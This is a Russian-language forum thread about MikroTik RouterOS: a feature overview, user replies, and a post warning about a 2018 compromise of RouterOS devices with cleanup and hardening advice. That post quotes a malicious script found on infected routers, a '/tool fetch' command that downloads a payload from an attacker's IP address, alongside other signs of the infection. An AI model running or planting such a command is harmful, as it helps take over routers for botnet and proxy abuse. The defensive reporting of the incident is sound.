Перейти к содержанию
СофтФорум - всё о компьютерах и не только

Рекомендуемые сообщения

MikroTik

Было бы незаслуженным не упомянуть об этом программном роутере, тем более что по своим возможностям он легко "делает" большинство других, но, увы, требует за это денег.

sitelogo.png

RouterOS MikroTik - изначально это специализированная unix-подобная операционная система для оборудования MikroTik RouterBOARD.

Однако она может быть установлена на обычном компьютере, превратив его в интернет-шлюз со всеми необходимыми функциями - маршрутизация, брандмауэр, контроль пропускной способности, работа с беспроводными сетями, VPN-сервер и многое другое.

Требования к оборудованию впечатляют, эта система с легкостью может быть установлена как на старенький компьютер с первым "пнем", так и на современное "железо". RouterOS поддерживает установку на IDE, SATA и USB устройства хранения информации, в том числе HDD, CF и SD карты и SSD диски, потребуется по крайней мере 64Mb дискового пространства.

Поддерживается огромное количество сетевого оборудования, даже такое как 802.11a/b/g/n беспроводные карты или 3G модемы.

Функциональность, как я уже отметил выше, на высоте:

Функции для работы с протоколом TCP/IP :

* Firewall и NAT – мощные настройки фильтрации пакетов (применимо к P2P соединениям), прекрасная реализация SNAT и DNAT, возможность классификации пакетов по:

o MAC-адресу источника;

o IP адресам (возможность задания сетей);

o диапазонам портов;

o IP протоколам;

o опциям протоколов (ICMP типам, TCP флагам и MSS);

o интерфейсам;

o внутренним цепочкам маркированных пакетов;

o ToS (DSCP);

o по содержимому пакетов;

o по размеру пакетов и др;

* Routing – статическая маршрутизация, multi-path маршрутизация, маршрутизация на основе политик(совмещённая с файерволом), реализация следующих протоколов динамической маршрутизации: RIP v1 / v2, OSPF v2, BGP v4;

* Управление качеством обслуживания QoS – возможность динамического управления полосой пропускания. Задания минимальной, максимальной и Burst скорости для IP, протокола, подсети, порта, цепочки, маркированной в файерволе. Возможность выбрать тип очереди. Доступны следующие возможные: PCQ, RED, SFQ, FIFO. Релизация осуществлена с помощью пакета HTB;

* Возможности HotSpot – возможность построение plug&play точек коллективного пользования Internet на основе встроеных средств HotSpot с аутентификацией на RADIUS сервере. Создание walled-garden зон, задания скорости, времени работы клиента и пр;

* Протоколы PTP туннелей - PPTP, PPPoE и L2TP с возможностями PAP, CHAP, MSCHAPv1 и MSCHAPv2 авторизации, RADIUS аутентификации и управления доступом, MPPE шифрования, PPPoE компрессии, управления полосой пропускания и использования диффиренцированных правил файервола;

* Создание простых туннелей - IP2IP туннели, EoIP (Ethernet over IP);

* Использование IPsec - IP security AH и ESP протоколы. MODP Diffie-Hellman группы 1,2,5. MD5 и SHA1 алгоритмы кеширования. DES, 3DES, AES-128, AES-192, AES-256 алгоритмы шифрования. Perfect Forwarding Secrecy (PFS) MODP группы 1,2,5;

* Proxy – встроеный FTP и HTTP/HTTPS кэширующий прокси сервер, прозрачное DNS и HTTP проксирование. Реализация SOCKS протокола, возможность задания ACL (Access Control Lists), построение кэширующих сетей с помощью возможности parent proxy;

* DHCP – базовая реализация DHCP сервера и DHCP релея, DHCP клиента, возможность резервирования адресов, поддержка RADIUS;

* VRRP – реализация VRRP протокола;

* UPnP - поддержка Universal Plug-and-Play;

* NTP - Network Time Protocol сервер и клиент. Возможности синхронизации с GPS системой;

* Monitoring/Accounting – мониторинг IP трафика в реальном времени. Логирование действией файервола, действий пользователя и поведения системы в целом;

* SNMP – доступ к функциям SNMP в режиме "только чтение";

* M3P - MikroTik Packet Packer Protocol механизм компрессии трафика и увеличения пропускной способности интерфейсов в целом;

* MNDP - MikroTik Neighbor Discovery Protocol. Поддержка Cisco Discovery Protocol (CDP);

* Tools – встроеные сетевые утилиты для мониторинга и проверки текущего состояния сети.

Функции для работы со вторым уровнем OSI:

* Беспроводные сети – поддержка IEEE802.11a/b/g беспроводных клиентов и точек доступа. Создание Wireless Distribution System (WDS), виртуальных точек доступа. Реализация 40 и 104-битного шифрования с WEP и WPA аутентификацией клиентов. Возможность задания ACL. Авторизация клиентов на RADIUS сервере. Поддержка роуминга и Access Point мостов;

* Bridge – возможность создания мостов между интерфейсами с фильтрацией проходящего трафика;

* VLAN – поддержка IEEE802.1q Virtual LAN на Ethernet и беспроводных интерфейсах, множественных VLAN-ов и построение VLAN-мостов;

* Synchronous - V.35, V.24, E1/T1, X.21, DS3 (T3), протоколы PPP, Cisco HDLC, Frame Relay;

* Asynchronous - serial PPP dial-in / dial-out; PAP, CHAP, MSCHAPv1 и MSCHAPv2 протоколы авторизации, RADIUS авторизация и аккаунтинг. Модемные пулы до 128 портов. Возможность создания интерфейсов с вызовом по требованию;

* ISDN - ISDN dial-in / dial-out с PAP, CHAP, MSCHAPv1 и MSCHAPv2 протоколами авторизации;

* RADIUS-авторизация и управление доступом на основе правил Radius сервера;

* SDSL – поддержка Single-line DSL.

Что же касается способов настройки, то сабж поддерживает несколько методов - локально, последовательная консоль, Telnet, SSH, GUI приложение Winbox (только для OS Windows) а также простой web интерфейс.

04591caa82b0.jpg

В случае отсутствия доступа на уровне IP RouterOS поддерживает доступ на MAC уровне, через MAC Telnet или Winbox.

Из плюсов данной системы стоит отметить большое количество документации в сети, причем и на русском языке.

Бесплатная лицензия, к слову сказать, существует, но для нее возможности существенно ограничены. Хотите получить что-то посущественнее - придется раскошелится.

И в продолжение несколько ссылок на обзорные статьи по RouterOS:

Установка RouterOS Mikrotik: система работает, администратор отдыхает

Делим Интернет или QoS на Mikrotik

Объединяем офисы с помощью Mikrotik

Настраиваем биллинг UTM с Mikrotik

Ссылка на комментарий
Поделиться на другие сайты

  • 8 лет спустя...

сегодня Микротик завоевал уже весомую долю рынка сетевого оборудования. Ведь реально хорошие у них роутеры. Их операционная система хоть и немного сложная простому обывателю, но все равно их техника хороша.

Ссылка на комментарий
Поделиться на другие сайты

  • 2 месяца спустя...

Купил Mikrotik RB941-2nD-TC. Всё настроил без проблем и PPOE и Wifi. Проблема заключается в том, что после отключения роутера от сети все настройки сбрасываются и приходится перенастраивать всё заново  - бегать с патч-кордом и прочее !! 

Это мой первый микротик, поэтому думаю что батарейка в нем села или вообще не предусмотрена, или в настройках можно где-то включить  ??

Что скажете ?

 

Ссылка на комментарий
Поделиться на другие сайты

что-то не так с микротиком. В нём сохраняются все настройки в реальном времени и после возобновления питания восстанавливаются.

Ссылка на комментарий
Поделиться на другие сайты

  • 6 месяцев спустя...
  • 1 месяц спустя...

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.

 

Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.

 

Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Ссылка на комментарий
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Последние посетители   0 пользователей онлайн

    • Ни одного зарегистрированного пользователя не просматривает данную страницу
×
×
  • Создать...